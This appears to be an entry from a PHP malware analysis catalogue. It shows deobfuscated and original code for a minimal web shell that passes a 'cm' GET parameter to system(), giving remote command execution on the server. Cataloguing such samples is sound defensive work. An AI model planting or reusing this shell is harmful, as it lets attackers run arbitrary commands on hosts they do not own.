PHP Malware Analysis

Back to list

Tags

Execution
system
Input
_GET

Deobfuscated code

<?php

echo "<form method=\"get\"> <input type=\"text\" name=\"cm\"> <button type=\"submit\">Submit</button></form>";
if (isset($_GET['cm'])) {
    echo system($_GET['cm']);
}

Original code

<?php
echo '<form method="get"> <input type="text" name="cm"> <button type="submit">Submit</button></form>';

if (isset($_GET['cm'])) {
    echo system($_GET['cm']);
}